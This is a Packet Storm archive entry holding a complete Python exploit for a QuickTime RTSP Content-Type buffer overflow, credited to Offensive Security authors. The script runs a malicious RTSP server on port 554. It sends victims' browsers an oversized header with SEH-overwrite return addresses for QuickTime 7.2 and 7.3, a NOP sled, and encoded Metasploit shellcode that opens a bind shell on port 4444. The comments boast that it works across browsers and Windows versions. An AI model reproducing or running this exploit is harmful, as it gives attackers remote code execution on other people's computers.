aquick-universal.txt

2007-11-27T00:00:00
ID PACKETSTORM:61218
Type packetstorm
Reporter Mati Aharoni
Modified 2007-11-27T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
##########################################################################  
# http://www.offensive-security.com  
# This exploit is completely "Universal" .... It has also been modded to work   
# via url redirection ...   
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....  
# re-edited by muts and javaguru1999 to spite Symantec  
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html  
# there IS NO SPOON!  
##########################################################################   
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,   
# the attack appears to be prevented because standard buffer overflow   
# prevention processes act before any damage can be done, Florio wrote.   
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,   
# the exploit works against Firefox if QuickTime is the default multimedia player,   
# according to Florio."  
##########################################################################  
# Calling Quicktime via URL kicks in an Extra Exception Handler,   
# of which we have no control over.  
# By making the buffer larger than the original exploit, we can overwrite   
# the last exception handler, and regain control over execution.  
# This is indeed an evil exploit - muhaha.  
##########################################################################  
  
from socket import *  
  
header = (  
'RTSP/1.0 200 OK\r\n'  
'CSeq: 1\r\n'  
'Date: 0x00 :P\r\n'  
'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n'  
'Content-Type: %s\r\n' # <-- overflow  
'Content-Length: %d\r\n'  
'\r\n')  
  
body = (  
'v=0\r\n'  
'o=- 16689332712 1 IN IP4 0.0.0.0\r\n'  
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'  
'i=1.mp3\r\n'  
't=0 0\r\n'  
'a=tool:ciamciaramcia\r\n'  
'a=type:broadcast\r\n'  
'a=control:*\r\n'  
'a=range:npt=0-213.077\r\n'  
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n'  
'a=x-qt-text-inf:1.mp3\r\n'  
'm=audio 0 RTP/AVP 14\r\n'  
'c=IN IP4 0.0.0.0\r\n'  
'a=control:track1\r\n'  
)  
  
# ExitProcess shellcode will kill IE, but keep the shell open  
  
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */  
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x37\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"  
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x32\x42\x42\x32\x41"  
"\x41\x30\x41\x41\x58\x42\x50\x38\x42\x42\x75\x39\x79\x4b\x4c\x61"  
"\x7a\x38\x6b\x50\x4d\x68\x68\x69\x69\x4b\x4f\x4b\x4f\x59\x6f\x53"  
"\x50\x4e\x6b\x32\x4c\x44\x64\x35\x74\x6e\x6b\x30\x45\x57\x4c\x4e"  
"\x6b\x41\x6c\x64\x45\x51\x68\x46\x61\x4a\x4f\x6c\x4b\x30\x4f\x46"  
"\x78\x6c\x4b\x71\x4f\x47\x50\x33\x31\x5a\x4b\x61\x59\x6e\x6b\x50"  
"\x34\x4e\x6b\x46\x61\x78\x6e\x50\x31\x69\x50\x4e\x79\x4e\x4c\x4b"  
"\x34\x6b\x70\x52\x54\x63\x37\x38\x41\x6a\x6a\x44\x4d\x63\x31\x6b"  
"\x72\x68\x6b\x49\x64\x77\x4b\x30\x54\x41\x34\x45\x78\x52\x55\x69"  
"\x75\x6e\x6b\x73\x6f\x75\x74\x56\x61\x7a\x4b\x33\x56\x4e\x6b\x36"  
"\x6c\x72\x6b\x4c\x4b\x53\x6f\x35\x4c\x77\x71\x38\x6b\x47\x73\x44"  
"\x6c\x6e\x6b\x4b\x39\x32\x4c\x35\x74\x77\x6c\x65\x31\x69\x53\x56"  
"\x51\x49\x4b\x65\x34\x4e\x6b\x67\x33\x34\x70\x4c\x4b\x77\x30\x74"  
"\x4c\x6e\x6b\x64\x30\x47\x6c\x4c\x6d\x6e\x6b\x41\x50\x63\x38\x53"  
"\x6e\x70\x68\x4e\x6e\x62\x6e\x56\x6e\x38\x6c\x52\x70\x6b\x4f\x7a"  
"\x76\x72\x46\x61\x43\x43\x56\x52\x48\x77\x43\x64\x72\x51\x78\x71"  
"\x67\x50\x73\x70\x32\x71\x4f\x31\x44\x4b\x4f\x4a\x70\x75\x38\x78"  
"\x4b\x68\x6d\x49\x6c\x75\x6b\x46\x30\x4b\x4f\x79\x46\x53\x6f\x6f"  
"\x79\x38\x65\x73\x56\x4c\x41\x58\x6d\x64\x48\x65\x52\x72\x75\x32"  
"\x4a\x73\x32\x49\x6f\x4a\x70\x33\x58\x78\x59\x63\x39\x39\x65\x4c"  
"\x6d\x72\x77\x6b\x4f\x6e\x36\x50\x53\x52\x73\x51\x43\x70\x53\x33"  
"\x63\x71\x53\x63\x63\x61\x53\x33\x63\x4b\x4f\x5a\x70\x73\x56\x51"  
"\x78\x37\x61\x41\x4c\x50\x66\x53\x63\x6c\x49\x5a\x41\x5a\x35\x51"  
"\x78\x4d\x74\x67\x6a\x30\x70\x4b\x77\x66\x37\x79\x6f\x4b\x66\x41"  
"\x7a\x32\x30\x72\x71\x33\x65\x59\x6f\x38\x50\x70\x68\x6f\x54\x6e"  
"\x4d\x64\x6e\x38\x69\x32\x77\x4b\x4f\x4e\x36\x51\x43\x41\x45\x39"  
"\x6f\x4a\x70\x71\x78\x4a\x45\x71\x59\x6d\x56\x43\x79\x76\x37\x4b"  
"\x4f\x39\x46\x52\x70\x72\x74\x46\x34\x31\x45\x4b\x4f\x68\x50\x4e"  
"\x73\x43\x58\x6b\x57\x71\x69\x6f\x36\x53\x49\x76\x37\x6b\x4f\x38"  
"\x56\x71\x45\x6b\x4f\x48\x50\x35\x36\x70\x6a\x31\x74\x45\x36\x31"  
"\x78\x62\x43\x32\x4d\x6f\x79\x7a\x45\x71\x7a\x30\x50\x33\x69\x46"  
"\x49\x6a\x6c\x6b\x39\x6a\x47\x73\x5a\x51\x54\x6f\x79\x6d\x32\x30"  
"\x31\x59\x50\x38\x73\x4d\x7a\x59\x6e\x43\x72\x36\x4d\x69\x6e\x73"  
"\x72\x54\x6c\x6f\x63\x4c\x4d\x72\x5a\x74\x78\x4c\x6b\x6c\x6b\x6e"  
"\x4b\x35\x38\x50\x72\x6b\x4e\x4c\x73\x64\x56\x4b\x4f\x43\x45\x32"  
"\x64\x79\x6f\x7a\x76\x33\x6b\x32\x77\x62\x72\x63\x61\x33\x61\x30"  
"\x51\x30\x6a\x53\x31\x71\x41\x46\x31\x52\x75\x32\x71\x6b\x4f\x4e"  
"\x30\x70\x68\x4e\x4d\x7a\x79\x46\x65\x4a\x6e\x72\x73\x69\x6f\x58"  
"\x56\x72\x4a\x69\x6f\x69\x6f\x66\x57\x39\x6f\x58\x50\x4c\x4b\x41"  
"\x47\x6b\x4c\x6c\x43\x4f\x34\x32\x44\x4b\x4f\x68\x56\x76\x32\x4b"  
"\x4f\x4e\x30\x71\x78\x33\x4e\x6a\x78\x49\x72\x43\x43\x61\x43\x4b"  
"\x4f\x48\x56\x69\x6f\x6a\x70\x42")  
  
tmp = "A" * 987  
tmp +="\xeb\x20\x90\x90" # short jump for 7.2  
tmp +="\xeb\x20\x9c\x66" # 669c20eb | funky magic - This is both a pop pop ret for 7.2, and a Short jump for 7.3  
tmp +="\x4e\x28\x86\x66" # 6686284e | pop pop ret for 7.3  
tmp += "\x90" * 92  
tmp += shellcode  
tmp += "\x41" * int(30000-len(shellcode)) # Play with this buffer if you still get exceptions.   
  
header %= (tmp, len(body))  
evil = header + body  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind(("0.0.0.0", 554))  
s.listen(1)  
print "[+] Listening on [RTSP] 554"  
c, addr = s.accept()  
print "[+] Connection accepted from: %s" % (addr[0])  
c.recv(1024)  
c.send(evil)  
raw_input("[+] Done, press enter to quit")  
c.close()  
s.close()  
  
# EoF  
`